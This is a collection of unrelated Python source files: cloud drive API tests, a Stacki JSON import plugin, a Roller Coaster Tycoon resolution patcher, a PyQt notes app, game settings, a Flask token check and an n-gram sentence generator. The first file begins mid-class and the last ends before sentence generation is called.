        # Select the lib drive with most interesting attributes.
        # By default use the first possible
        libdrive_uuid = libdrives[0]['uuid']
        for d in libdrives:
            # pick a drive with licenses
            if len(d['licenses']) > 0:
                libdrive_uuid = d['uuid']
                break

        with self.dump_response('libdrive_get'):
            libdrive = self.client.get(libdrive_uuid)

        dc = cr.Drive()
        with DumpResponse(clients=[dc])('librdrive_get_through_drives'):
            libdrive_from_drive_url = dc.get(libdrive_uuid)

        # Library drives have no owner and must look the same through
        # either endpoint.
        self.assertIsNone(libdrive_from_drive_url['owner'])
        self.assertEqual(libdrive['uuid'], libdrive_from_drive_url['uuid'])
        self.assertEqual(libdrive['name'], libdrive_from_drive_url['name'])

    def test_attaching_cdrom(self):
        """A library cdrom can be attached directly to a new guest."""
        server_client = cr.Server()

        found = None
        for drive in self.client.list():
            if drive['media'] == 'cdrom':
                found = drive
                break

        if found is None:
            raise unittest.SkipTest(
                'Cannot find a cdrom drive in drives library'
            )

        guest_def = self._gen_server_definition(drives=[found['uuid']])
        new_guest = server_client.create(guest_def)
        server_client.delete(new_guest['uuid'])
        self._wait_deleted(new_guest['uuid'], client=server_client)

    def test_attaching_preinstalled(self):
        """Attaching a preinstalled library disk directly must be refused
        (it has to be cloned first).
        """
        server_client = cr.Server()

        found = None
        for drive in self.client.list():
            if drive['media'] == 'disk':
                found = drive
                break

        if found is None:
            raise unittest.SkipTest(
                'Cannot find a preinstalled drive in the drives library.'
            )

        guest_def = self._gen_server_definition(drives=[found['uuid']])
        with self.assertRaises(errors.PermissionError):
            server_client.create(guest_def)
@attr('stress_test')
class DriveStressTest(StatefulResourceTestBase):
    """Stress tests: create/clone many drives at once to exercise the API
    under load.  Progress counters are printed inline as the calls return.
    """
    # Number of clones made from the persistent image in test_clone.
    CLONE_COUNT = 20
    # Number of small drives created in test_create_delete.
    DRIVE_COUNT = 100
    def setUp(self):
        super(DriveStressTest, self).setUp()
        self.client = cr.Drive()
    def _get_min_drive_size(self):
        # Smallest drive size used for the stress drives (1 GB, decimal).
        return 1 * 1000 ** 3
    def test_create_delete(self):
        """Creating MANY small drives via API to see if it works."""
        min_size = self._get_min_drive_size()
        define_list = [
            {
                "name": "test_drive_{}".format(num),
                "size": min_size,
                "media": "disk",
            } for num in range(self.DRIVE_COUNT)
        ]
        res = []
        print(f'\nCreating Drives ({self.DRIVE_COUNT})', end='', flush=True)
        for i, drive_def in enumerate(define_list):
            res.append(self.client.create(drive_def))
            print(f' {i + 1}', end='', flush=True)
        # Only wait after all creates are issued, so creation overlaps.
        for creating_drive in res:
            self._wait_for_status(
                creating_drive['uuid'],
                status='unmounted',
                client=self.client,
                timeout=60
            )
        print('\nDeleting Drives', end='', flush=True)
        for i, drive in enumerate(res):
            self.client.delete(drive['uuid'])
            print(f' {i + 1}', end='', flush=True)
        for deleted_drive in res:
            self._wait_deleted(deleted_drive['uuid'], self.client, timeout=60)
    def test_clone(self):
        """Clone SOME drives via API to see if it works."""
        puuid, ppass = self._get_persistent_image_uuid_and_pass()
        cloned = []
        print(f'\nCreating Clones ({self.CLONE_COUNT})', end='', flush=True)
        for num in range(self.CLONE_COUNT):
            cloned.append(
                self.client.clone(
                    puuid,
                    {'name': "test_atom_clone_{}".format(num)}
                )
            )
            print(f' {num + 1}', end='', flush=True)
        for cloning_drive in cloned:
            self._wait_for_status(
                cloning_drive['uuid'],
                status='unmounted',
                client=self.client,
                timeout=self.TIMEOUT_DRIVE_CLONING
            )
        print('\nDeleting Clones', end='', flush=True)
        for i, drive in enumerate(cloned):
            self.client.delete(drive['uuid'])
            print(f' {i + 1}', end='', flush=True)
        for deleted_drive in cloned:
            self._wait_deleted(deleted_drive['uuid'], self.client, timeout=60)
class TestUpload(StatefulResourceTestBase):
    """Tests resumable drive upload using a locally generated random file."""

    def setUp(self):
        super(TestUpload, self).setUp()
        # 10.something MiB — a random tail makes the final padding loop run.
        self.file_size = 10 * 1024 ** 2 + random.randrange(0, 1024)
        self.file_path = self.generate_file()
        # self.downloaded_path = tempfile.mktemp(prefix='test_download_')
        self.dc = cr.Drive()

    def tearDown(self):
        super(TestUpload, self).tearDown()
        os.remove(self.file_path)
        # os.remove(self.downloaded_path)

    def generate_file(self):
        """Create a temp file of exactly ``self.file_size`` random bytes.

        Returns the path; the caller (tearDown) removes the file.
        """
        fd, path = tempfile.mkstemp(prefix='drive_upload_test')
        os.fdopen(fd).close()
        with open(path, 'r+b') as f:
            written = 0
            # A 4 KiB chunk of repeated random 64-bit values.
            data = struct.pack('=Q', random.randrange(0, 2 ** 64)) * 128 * 4
            while written + 1024 * 4 <= self.file_size:
                f.write(data)
                written += 1024 * 4
            # Pad to the exact size one byte at a time.
            # Bug fix: chr(x).encode() emits TWO bytes for x >= 128 (UTF-8),
            # overshooting file_size while only counting 1 — write the raw
            # byte instead.
            while written < self.file_size:
                f.write(bytes([random.randrange(0, 2 ** 8)]))
                written += 1
        return path

    def test_resumable_upload(self):
        """Upload the generated file in a subprocess and verify the result."""
        from cloudsigma.resumable_upload import Upload

        def do_upload(queue):
            up = Upload(
                self.file_path,
                chunk_size=1024 ** 2,
                drive_name='test_drive_upload'
            )
            up.upload()
            queue.put((up.drive_uuid, up.uploaded_size))

        queue = Queue()
        proc = Process(target=do_upload, args=(queue,))
        proc.start()
        proc.join(2 * 60)
        if proc.is_alive():
            proc.terminate()
            raise Exception('Upload did not finish in time')

        uuid, uploaded_size = queue.get(block=False)
        LOG.debug('Finished uploading {}'.format(uuid))
        self.assertEqual(uploaded_size, os.path.getsize(self.file_path))
        drive = self.dc.get(uuid)
        self.assertEqual(drive['status'], 'unmounted')
        self.dc.delete(uuid)
| 2.046875 | 2 |
# common/src/stack/command/stack/commands/load/json/plugin_global.py
# @copyright@
# Copyright (c) 2006 - 2018 Teradata
# All rights reserved. Stacki(r) v5.x stacki.com
# https://github.com/Teradata/stacki/blob/master/LICENSE.txt
# @copyright@
import stack.commands
import json
from stack.exception import CommandError
class Plugin(stack.commands.Plugin, stack.commands.Command):
	"""Load plugin that imports the 'global' section of a stacki JSON dump.

	Handles the attrs, route, firewall, partition and controller scopes by
	replaying the corresponding ``stack`` commands; unknown scopes are
	logged and skipped.
	"""
	notifications = True

	def provides(self):
		return 'global'

	def requires(self):
		# These sections must be loaded before global data references them.
		return [ 'software', 'environment', 'group', 'network', 'appliance', 'os' ]

	def run(self, args):
		# check if the user would like to import global data
		if args and 'global' not in args:
			return

		# self.owner.data contains the data from the json file defined in init
		if 'global' in self.owner.data:
			import_data = self.owner.data['global']
		else:
			self.owner.log.info('no global data in json file')
			return

		self.notify('\n\tLoading global\n')

		for scope in import_data:
			# check to make sure the scope is valid
			if scope == 'attrs':
				for attr in import_data[scope]:
					# Only 'shadow' typed attrs are stored as shadow attrs.
					attr_shadow = attr['type'] == 'shadow'
					parameters = [
						f'attr={attr["attr"]}',
						f'value={attr["value"]}',
						f'shadow={attr_shadow}',
					]
					self.owner.try_command('set.attr', parameters, f'setting global attr {attr["attr"]}', 'exists')

			elif scope == 'route':
				for route in import_data[scope]:
					parameters = [
						f'address={route["network"]}',
						f'gateway={route["gateway"]}',
						f'netmask={route["netmask"]}',
					]
					self.owner.try_command('add.route', parameters, f'adding global route {route["network"]}', 'exists')

			elif scope == 'firewall':
				for rule in import_data[scope]:
					parameters = [
						f'action={rule["action"]}',
						f'chain={rule["chain"]}',
						f'protocol={rule["protocol"]}',
						f'service={rule["service"]}',
						f'network={rule["network"]}',
						f'output-network={rule["output-network"]}',
						f'rulename={rule["name"]}',
						f'table={rule["table"]}'
					]
					if rule['flags']:
						parameters.append(f'flags={rule["flags"]}')
					if rule['comment']:
						parameters.append(f'comment={rule["comment"]}')
					# If the firewall rule already exists, replace it with the
					# one from the JSON (firewall has no 'set' commands).
					# Typo fix: log messages previously said "fule".
					if not self.owner.try_command('add.firewall', parameters, f'adding global firewall rule {rule["name"]}', 'exists'):
						self.owner.try_command('remove.firewall', [ f'rulename={rule["name"]}' ], f'removing pre-existing global firewall rule {rule["name"]}', 'exists')
						self.owner.try_command('add.firewall', parameters, f'adding global firewall rule {rule["name"]}', 'exists')

			elif scope == 'partition':
				for partition in import_data[scope]:
					parameters = [
						f'device={partition["device"]}',
						f'partid={partition["partid"]}',
						f'size={partition["size"]}',
					]
					if partition['options']:
						parameters.append(f'options={partition["options"]}')
					if partition['mountpoint']:
						parameters.append(f'mountpoint={partition["mountpoint"]}')
					if partition['fstype']:
						parameters.append(f'type={partition["fstype"]}')
					self.owner.try_command('add.storage.partition', parameters, f'adding global partition {partition}', 'exists')

			elif scope == 'controller':
				for controller in import_data[scope]:
					parameters = [
						f'arrayid={controller["arrayid"]}',
						f'raidlevel={controller["raidlevel"]}',
						f'slot={controller["slot"]}',
					]
					# Bug fix: the optional values were appended bare; the
					# stack command expects key=value parameters like every
					# other scope handled above.
					if controller['adapter']:
						parameters.append(f'adapter={controller["adapter"]}')
					if controller['enclosure']:
						parameters.append(f'enclosure={controller["enclosure"]}')
					if controller['options']:
						parameters.append(f'options={controller["options"]}')
					self.owner.try_command('add.storage.controller', parameters, f'adding global controller {controller["arrayid"]}', 'exists')

			else:
				self.owner.log.info(f'error potentially invalid entry in json. {scope} is not a valid global scope')
| 1.992188 | 2 |
# rct_patch.py
#
# Author: jeFF0Falltrades
#
# A patching script for the Roller Coaster Tycoon (1999) game
# executable for play on modern systems at full resolution.
#
# Homepage with Video Tutorial:
# https://github.com/jeFF0Falltrades/Game-Patches/tree/master/rct_full_res
#
# MIT License
#
# Copyright (c) 2020 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from argparse import ArgumentParser, RawTextHelpFormatter
from os.path import isfile
# Dict of both hardcoded and variable values to be checked/patched.
# Outer keys name the patch group; each inner dict maps the original hex
# byte pattern (as found in RCT.exe) to its replacement.  The {wl}/{wh}
# and {hl}/{hh} placeholders are the low/high bytes of the desired
# width/height and are filled in by populateVals().
PATCHES = {
    'FULL_SCREEN': {
        # Patches default window function to use full screen mode
        'E8 86 7A FF FF': 'E8 33 7A FF FF'
    },
    'WINDOWED': {
        # Patches maximum allowable resolution for windowed mode
        '00 05 00 00 0F 8E 07 00 00 00 C7 45 FC 00 05 00 00 81 7D F4 00 04 00 00 0F 8E 07 00 00 00 C7 45 F4 00 04 00 00':
        '{wl} {wh} 00 00 0F 8E 07 00 00 00 C7 45 FC {wl} {wh} 00 00 81 7D F4 {hl} {hh} 00 00 0F 8E 07 00 00 00 C7 45 F4 {hl} {hh} 00 00'
    }
}
# Gets command line arguments
def getCLAs():
    """Build the argument parser and return the parsed command line.

    Sub-commands: 'auto' (patch the exe), 'check' (verify compatibility),
    'manual' (print hex search/replace pairs only).
    """
    ap = ArgumentParser(
        description=
        'Roller Coaster Tycoon (1999) Full Resolution Patch by jeFF0Falltrades\n\nHomepage: https://github.com/jeFF0Falltrades/Game-Patches/tree/master/rct_full_res',
        formatter_class=RawTextHelpFormatter)
    sp = ap.add_subparsers(dest='cmd')
    auto = sp.add_parser(
        'auto',
        help=
        'Attempt to patch the program automatically (Patches for full screen mode by default)'
    )
    auto.add_argument('width', help='Your desired resolution width')
    auto.add_argument('height', help='Your desired resolution height')
    auto.add_argument(
        '-t',
        '--target',
        default='RCT.exe',
        help='Full path to RCT.EXE (defaults to local directory)')
    auto.add_argument(
        '-o',
        '--outfile',
        default='rct_patched.exe',
        help='Desired output file name (defaults to `rct_patched.exe`)')
    auto.add_argument('-w',
                      '--windowed',
                      action='store_true',
                      help='Patch for windowed mode only')
    check = sp.add_parser(
        'check', help='Check a file for compatibility with auto-patching mode')
    check.add_argument(
        '-t',
        '--target',
        default='RCT.exe',
        help='Full path to RCT.EXE (defaults to local directory)')
    man = sp.add_parser(
        'manual',
        help=
        'Do not patch the file, just show the necessary hex replacements for manual search/replace with a hex editor'
    )
    man.add_argument('width', help='Your desired resolution width')
    man.add_argument('height', help='Your desired resolution height')
    return ap.parse_args()
# Populates empty dictionary values based on user input
def populateVals(w, h):
    """Fill the {wl}/{wh}/{hl}/{hh} placeholders in PATCHES['WINDOWED'].

    :param w: desired resolution width (int or numeric string)
    :param h: desired resolution height (int or numeric string)
    :raises SystemExit: when w/h are not valid integers
    """
    try:
        w = int(w)
        h = int(h)
    except ValueError:
        # Bug fix: this previously referenced the global `args`, which only
        # exists when run as a script (NameError when called as a library).
        # Use the still-unconverted parameter values instead.
        raise SystemExit(
            'Invalid width and height values received: {}x{}'.format(w, h))
    for key in PATCHES['WINDOWED']:
        # Split each dimension into little-endian low/high bytes as
        # two-digit hex strings.
        PATCHES['WINDOWED'][key] = PATCHES['WINDOWED'][key].format(
            wl=hex(w & 0XFF).replace('0x', '').zfill(2),
            wh=hex((w & 0XFF00) >> 8).replace('0x', '').zfill(2),
            hl=hex(h & 0XFF).replace('0x', '').zfill(2),
            hh=hex((h & 0XFF00) >> 8).replace('0x', '').zfill(2))
# Checks if default values are found in target file
def fileCheck(fp):
    """Return True when every original byte pattern exists in the file."""
    with open(fp, 'rb') as f:
        data = f.read()
    return all(
        data.find(bytearray.fromhex(pattern)) != -1
        for group in PATCHES.values()
        for pattern in group
    )
# Prints hex string replacements for manual patching
def printReplacements():
    """Print each search pattern and its replacement, one pair per block."""
    print('\n{}\n\t--> {}\n\n'.format('Search String', 'Replacement'))
    for group in PATCHES.values():
        for search, replacement in group.items():
            print('{}\n\t--> {}\n'.format(search, replacement))
# Patches for full screen mode
def patchFullScreen(fp, outfile):
    """Apply every patch group (full screen + windowed max-res) to fp,
    writing the patched bytes to outfile.
    """
    with open(fp, 'rb') as f:
        data = f.read()
    for group in PATCHES.values():
        for search, replacement in group.items():
            data = data.replace(bytearray.fromhex(search),
                                bytearray.fromhex(replacement))
    with open(outfile, 'wb') as o:
        o.write(data)
# Patches for windowed mode
def patchWindowed(fp, outfile):
    """Apply only the windowed max-resolution patch to fp, writing the
    patched bytes to outfile.
    """
    with open(fp, 'rb') as f:
        data = f.read()
    for search, replacement in PATCHES['WINDOWED'].items():
        data = data.replace(bytearray.fromhex(search),
                            bytearray.fromhex(replacement))
    with open(outfile, 'wb') as o:
        o.write(data)
# Checks if file exists and passes predefined checks
def doFileChecks(fp):
    """Exit with a message unless fp exists and contains the expected
    original byte patterns (fileCheck).
    """
    if not isfile(fp):
        raise SystemExit(
            'Cannot find file {}. Check file path and try again'.format(fp))
    if not fileCheck(fp):
        raise SystemExit(
            'File failed offset check: {}. Use manual mode for replacements or modify patching script.'
            .format(fp))
if __name__ == '__main__':
    args = getCLAs()
    if args.cmd == 'check':
        # Only verify that the default hex patterns exist in the target binary.
        doFileChecks(args.target)
    elif args.cmd == 'manual':
        # Print search/replace pairs for a hex editor; no file is modified.
        populateVals(args.width, args.height)
        printReplacements()
    elif args.cmd == 'auto':
        populateVals(args.width, args.height)
        doFileChecks(args.target)
        if args.windowed:
            patchWindowed(args.target, args.outfile)
        else:
            patchFullScreen(args.target, args.outfile)
    else:
        raise SystemExit(
            'Unknown command received. Use `python rct_patch.py -h` for help')
    print('Success!')
notes.py | Lianaghn/pin | 0 | 12769665 | from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QLabel, QListWidget, QLineEdit, QTextEdit, QInputDialog, QHBoxLayout, QVBoxLayout, QFormLayout
import json
app = QApplication([])
# Default note book shown on first launch.  Keys and values are user-facing
# Russian text / storage keys and must stay exactly as written.
notes = {
    "Добро пожаловать!" : {
        "текст" : "Это самое лучшее приложение для заметок в мире!",
        "теги" : ["добро", "инструкция"]
    }
}
# Seed the storage file with the defaults (reloaded again after the UI is built).
with open("notes_data.json", "w") as file:
    json.dump(notes, file)
# Main window
notes_win = QWidget()
notes_win.setWindowTitle('Умные заметки')
notes_win.resize(900, 600)
# Widgets: note list, note buttons, tag field/buttons, tag list, text editor
list_notes = QListWidget()
list_notes_label = QLabel('Список заметок')
button_note_create = QPushButton('Создать заметку')
button_note_del = QPushButton('Удалить заметку')
button_note_save = QPushButton('Сохранить заметку')
field_tag = QLineEdit('')
field_tag.setPlaceholderText('Введите тег...')
field_text = QTextEdit()
button_tag_add = QPushButton('Добавить к заметке')
button_tag_del = QPushButton('Открепить от заметки')
button_tag_search = QPushButton('Искать заметки по тегу')
list_tags = QListWidget()
list_tags_label = QLabel('Список тегов')
# Arrange the widgets in layouts: editor on the left (col_1),
# note/tag controls on the right (col_2).
layout_notes = QHBoxLayout()
col_1 = QVBoxLayout()
col_1.addWidget(field_text)
col_2 = QVBoxLayout()
col_2.addWidget(list_notes_label)
col_2.addWidget(list_notes)
row_1 = QHBoxLayout()
row_1.addWidget(button_note_create)
row_1.addWidget(button_note_del)
row_2 = QHBoxLayout()
row_2.addWidget(button_note_save)
col_2.addLayout(row_1)
col_2.addLayout(row_2)
col_2.addWidget(list_tags_label)
col_2.addWidget(list_tags)
col_2.addWidget(field_tag)
row_3 = QHBoxLayout()
row_3.addWidget(button_tag_add)
row_3.addWidget(button_tag_del)
row_4 = QHBoxLayout()
row_4.addWidget(button_tag_search)
col_2.addLayout(row_3)
col_2.addLayout(row_4)
layout_notes.addLayout(col_1, stretch = 2)
layout_notes.addLayout(col_2, stretch = 1)
notes_win.setLayout(layout_notes)
def add_note():
    """Prompt for a note title and create an empty note under that title."""
    note_name, ok = QInputDialog.getText(notes_win, 'Добавить заметку', 'Название заметки:')
    if ok and note_name != '':
        # BUG FIX: the original indexed `notes[notes_name]`, an undefined name
        # (NameError on first use); the dialog result is bound to `note_name`.
        notes[note_name] = {'текст': '', 'теги': []}
        list_notes.addItem(note_name)
        print(notes)
def show_note():
    """Show the selected note's text and tags in the editor panes."""
    key = list_notes.selectedItems()[0].text()
    # debug output: which note was opened
    print(key)
    field_text.setText(notes[key]["текст"])
    list_tags.clear()
    list_tags.addItems(notes[key]["теги"])
def save_note():
    """Persist the edited text of the selected note to notes_data.json."""
    if list_notes.selectedItems():
        key = list_notes.selectedItems()[0].text()
        notes[key]['текст'] = field_text.toPlainText()
        with open ('notes_data.json', 'w') as file:
            json.dump(notes, file, sort_keys=True)
        print(notes)
    else:
        # Nothing selected: report it instead of crashing on an empty selection.
        print('Заметка для сохранения не выбрана!')
def del_note():
    """Delete the selected note, refresh the UI and rewrite the JSON file."""
    if list_notes.selectedItems():
        key = list_notes.selectedItems()[0].text()
        del notes[key]
        # Clear and repopulate the widgets so the deleted note disappears.
        list_notes.clear()
        list_tags.clear()
        field_text.clear()
        list_notes.addItems(notes)
        with open('notes_data.json', 'w') as file:
            json.dump(notes, file, sort_keys=True)
        print(notes)
    else:
        print('Заметка для удаления не выбрана!')
# Wire UI events to their handlers.
list_notes.itemClicked.connect(show_note)
button_note_create.clicked.connect(add_note)
button_note_save.clicked.connect(save_note)
button_note_del.clicked.connect(del_note)
notes_win.show()
# Reload notes from disk, replacing the seeded defaults written above.
with open("notes_data.json", "r") as file:
    notes = json.load(file)
list_notes.addItems(notes)
app.exec_()
| 2.65625 | 3 |
settings.py | chingandy/intelligent-space-invaders-player | 1 | 12769666 |
class Settings():
    """Holds every configurable value for the Alien Invasion game.

    Static options are assigned once in __init__; values that change as the
    game speeds up live in initialize_dynamic_settings so a new game can
    reset them.
    """

    def __init__(self):
        """Initialize static settings, then apply the dynamic defaults."""
        # Screen
        self.screen_width = 800
        self.screen_height = 600
        self.bg_color = (10, 10, 10)
        # Ship
        self.ship_speed_factor = 1.5
        self.ship_limit = 3
        # Bullets
        self.bullet_speed_factor = 5
        self.bullet_width = 3
        self.bullet_height = 15
        self.bullet_color = (255, 255, 0)
        self.bullets_allowed = 3
        # Alien fleet (direction: 1 -> right, -1 -> left)
        self.alien_speed_factor = 3
        self.fleet_drop_speed = 20
        self.fleet_direction = 1
        # Difficulty scaling
        self.speedup_scale = 1.1
        self.score_scale = 1.5
        self.initialize_dynamic_settings()

    def initialize_dynamic_settings(self):
        """Reset the values that evolve during play to their defaults."""
        self.ship_speed_factor = 10
        self.bullet_speed_factor = 3
        self.alien_speed_factor = 1
        self.fleet_direction = 1
        self.alien_points = 50

    def increase_speed(self):
        """Make everything faster and aliens worth more points."""
        scale = self.speedup_scale
        self.ship_speed_factor *= scale
        self.bullet_speed_factor *= scale
        self.alien_speed_factor *= scale * 1.3
        self.alien_points = int(self.alien_points * self.score_scale)
| 3.421875 | 3 |
acondbs/auth/__init__.py | simonsobs/acondbs | 0 | 12769667 | <reponame>simonsobs/acondbs
from flask import request
from ..models import (
GitHubToken,
GitHubUser,
AccountAdmin
)
##__________________________________________________________________||
def is_signed_in():
    """Return True when the request carries a GitHub token known to the DB."""
    token = _get_token_from_http_headers()
    if not token:
        return False
    return GitHubToken.query.filter_by(token=token).one_or_none() is not None
##__________________________________________________________________||
def is_admin():
    """Return True when the request's token belongs to a GitHub user listed
    in the AccountAdmin table.
    """
    if not is_signed_in():
        return False
    token = _get_token_from_http_headers()
    if not token:
        return False
    # Resolve the token to its GitHub user record.
    user_model = GitHubUser.query.join(GitHubToken). \
        filter(GitHubToken.token==token). \
        one_or_none()
    if not user_model:
        return False
    # The user is an admin only if their login appears in AccountAdmin.
    admin_model = AccountAdmin.query. \
        filter_by(git_hub_login=user_model.login). \
        one_or_none()
    if not admin_model:
        return False
    return True
##__________________________________________________________________||
def _get_token_from_http_headers():
    """Extract a bearer token from the request's Authorization header.

    Accepts 'Bearer xxxx', 'Bearer "xxxx"' or "Bearer 'xxxx'".
    Returns None when the header is missing or malformed.
    """
    auth_header = request.headers.get('Authorization')
    # e.g., 'Bearer "xxxx"', "Bearer 'xxxx'", or 'Bearer xxxx'
    if not auth_header:
        return None
    parts = auth_header.split()
    # ROBUSTNESS FIX: a bare 'Bearer' header (no token part) used to raise
    # IndexError; treat it as "no token" instead.
    if len(parts) < 2:
        return None
    return parts[1].strip('"\'')
##__________________________________________________________________||
| 2.375 | 2 |
tests/unit/service/test_business_super_man.py | thiagortz/justice-league | 2 | 12769668 | from unittest import TestCase
from unittest.mock import patch
from app.service.business_service import SuperMan
class TestSuperMan(TestCase):
    """Unit tests for app.service.business_service.SuperMan."""
    @classmethod
    def setUpClass(cls):
        pass
    @classmethod
    def tearDownClass(cls):
        pass
    def setUp(self):
        pass
    def tearDown(self):
        pass
    @patch("app.service.business_service.SuperMan._request_get", return_value="response")
    def test_request_get(self, mock_request_get):
        """to_call() should GET the expected resource with the CPF as a parameter
        and return the raw response from _request_get."""
        super_man = SuperMan(CPF='10387595612')
        actual = super_man.to_call()
        mock_request_get.assert_called_once_with(resource='5af099f2310000610096c6ee', params={'CPF': '10387595612'})
        self.assertEqual(actual, 'response')
| 2.875 | 3 |
talker.py | Allahcadrimbo/RandomTalker | 0 | 12769669 | <gh_stars>0
"""
Author: <NAME>
Date: 10/4/19
PA #2 NLP
In this PA we are attempting to create a random text generator. The program (talker) will learn an N-gram language model
from an arbitrary number of plain text files, and then use the generated model to generate the random sentences. An
N-gram is a probabilistic language model that is trying to predict the next item (in this case a word) based on n
previous words. Talker should be able to work for n values of 1, 2, and 3 (unigrams, bigrams, and trigrams). Talker
should be able to output a user specified number of sentences. Talker should also be able to take any number of text
files passed in by the user. We want talker to get all of this information from command line arguments. No matter the
number of text files we will treat them as a single corpus and learn one n-gram model. Furthermore, talker needs to be
able to identify sentence boundaries in this case we will assume !,., and ? are the only boundaries. The Ngrams should
not cross the sentence boundaries.
Talker is ran by running a command with the following syntax: python3 talker.py n m text_file(s)
where n is the ngram integer, m is the number of sentences to be outputted, and text_file(s) is one or more text files
in the current directory that will be used to create the ngram model.
Here is an example input and it's corresponding output:
input: python3 talker.py 2 10 theraven.txt caskofamontillado.txt fallofthehouseofusher.txt clarissa1.txt clarissa2.txt
output:
This program generates random sentences based on an Ngram model. CS 4242 by <NAME>.
Command line settings : talker 2 10
1. heard i was now, belford thing before you making herself an, there need letter from clarissa, who, he should pursue
when you advise though by surprise be made >>> sight, all so dearly loved giddy fellows.
2. by day?
3. a chairman : a poor hand say, if that i could ]: and i only his displeasure of mr.
4. the good-for-little magnates horns.
5. and it might in what relates of your goodness, or for to have her proposed, set wretch, as, that i what i have write.
6. then accounts, that period, .
7. with such a out of regard a thousand witnesses longing to hear to raise his never will!
8. pinion over fabric that i may comfort!
9. never was there in the dining-room begs he will six words--a religious.
10. your third article but nevertheless, the person ; , all of, which conceals that it had that at hampstead did i owe
and young tumbled of your fine i, (urging shall at least to be proud pausing--and rising from.
Algorithm:
- Grab all of the command line variables and assign them to variables
- Process all of the passed in text files
- Make all of the text lower case
- Put a space between all numeric, alphabetic chars, and punctuation so they are all counted as distinct tokens
- Add each text processed text file to a single corpus so it can be used as if it was one file
- Take the processed corpus and turn it into a list of tokens by splitting on whitespace
- Check to makes sure there is at least 1,000,000 tokens
- Create the Ngram model base off of the list of tokens
- For each token grab it and the next n token and add them to a sublist of the ngram_model list
- Do this for all tokens excepts the last n in the list
- Process the Ngram model
- Turn all of the elements in each sublist into one element by joining them with a space in between
- Generate the random sentences based off of the ngram model
- Randomly pick a sublist from ngram model and append them into a sentence until you encounter a sentence boundary
- Process the sentence
- Remove the space between a punctuation mark and the alphanumeric preceding it
- Remove any portion of an incomplete sentence at the end of the sentence
- Print the sentence
"""
import re
import sys
import random
# Reads one plain-text file and normalises it so punctuation and digit/letter
# boundaries become separate whitespace-delimited tokens.
def process_text(file_name):
    """Return the lower-cased file contents with token-splitting spaces inserted."""
    with open(file_name, "r", encoding="utf8") as source:
        text = source.read().lower()
    # Order matters: punctuation splits run first, then digit/letter boundaries.
    token_splits = [
        (r'([a-zA-Z0-9])([,.!\[\]%{}?#&*@":;])', r'\1 \2'),  # alnum then punct
        (r'([,.!\[\]%{}#&*@":;])([a-zA-Z0-9])', r'\1 \2'),   # punct then alnum
        (r'([0-9])([a-zA-Z])', r'\1 \2'),                    # digit then letter
        (r'([a-zA-Z])([0-9])', r'\1 \2'),                    # letter then digit
    ]
    for pattern, replacement in token_splits:
        text = re.sub(pattern, replacement, text)
    return text
# Creates a ngram model dictated by the integer passed in as n and trains the
# model on the list of tokens passed in.
def create_ngram_model(n, tokens):
    """Return every run of n+1 consecutive tokens as a list of lists.

    Grabbing the next n tokens is equivalent to conditioning on the previous
    n tokens; slices stop where fewer than n tokens remain ahead, so no gram
    extends past the end of the list.
    """
    return [tokens[i:i + n + 1] for i in range(len(tokens) - n)]
# Flattens each gram so the model goes from [["x", "y", "z"], ...]
# to ["x y z", ...].
def process_model(model):
    """Join each gram's tokens with single spaces."""
    return [' '.join(gram) for gram in model]
# This method will take the # of sentences to generate and a model to generate off of.
def generate_random_sentences(number_of_sentences, model):
    """Print `number_of_sentences` random sentences assembled from `model` grams."""
    # Do this for as many sentences are required by number_of_sentences
    for y in range(number_of_sentences):
        sentence = ""
        # This while loop will randomly grab a sublist from the list model until a sentence boundary is encountered
        while not re.search(r'[!.?]', sentence):
            sentence += " " + model[random.randint(0, len(model)-1)]
        # We print the finished sentence with a numerical value stating which sentence it is after some processing on
        # the sentence
        print(str(y+1) + ". " + process_random_sentences(sentence))
# Used to process the random sentence to make it look a little bit more like a real sentence
def process_random_sentences(sentence):
    """Tidy a generated sentence.

    Removes the space between a token and its trailing punctuation, then
    truncates the sentence at the last sentence boundary (. ! or ?) so no
    partial sentence is left dangling at the end.
    """
    # This regex will find all punctuation following an alphanumeric and remove the space in between them
    # Example my cat . -> my cat.
    sentence = re.sub(r'([a-z0-9]+) ([,.!?])', r'\1\2', sentence)
    # BUG FIX: the original compared e.g. `period > (exclamation and question)`,
    # where the parenthesised part is a boolean short-circuit chain, not a
    # comparison against both indices, so the wrong (earlier) boundary could be
    # chosen.  Take the max of the last occurrence of each boundary instead
    # (rfind returns -1 when absent, matching the original's "no truncation"
    # behaviour when no boundary exists).
    last_boundary = max(sentence.rfind('.'), sentence.rfind('!'), sentence.rfind('?'))
    if last_boundary > 0:
        sentence = sentence[:last_boundary + 1]
    return sentence
if __name__ == "__main__":
    arg_len = len(sys.argv)  # Get the number of command line arguments
    ngram = int(sys.argv[1])  # An integer that represents the n gram number
    m = int(sys.argv[2])  # An integer that is the number of random sentences to be generated
    corpus = ""  # Our corpus that we will create the ngram model with
    print("This program generates random sentences based on an Ngram model. CS 4242 by <NAME>."
          "\nCommand line settings : talker " + str(ngram) + " " + str(m) + "\n")
    # Iterate through all of the file names passed through and process them and then append them to the corpus
    for i in range(3, arg_len):
        # Adds the processed text file to the pre-existing corpus. A space is added
        # to ensure the last token of the existing corpus is separate from the first token of the appended text
        corpus += " " + process_text(sys.argv[i])
    # Take our finished corpus and turn it into a list of tokens. This will split on whitespace.
    token_list = corpus.split()
    # A check to make sure the corpus is at least a million tokens (a warning only; generation still runs)
    if len(token_list) < 1000000:
        print("The corpus is less than a million tokens!\n")
    # Create our ngram model and do a little bit of processing to it first
    ngram_model = process_model(create_ngram_model(ngram, token_list))
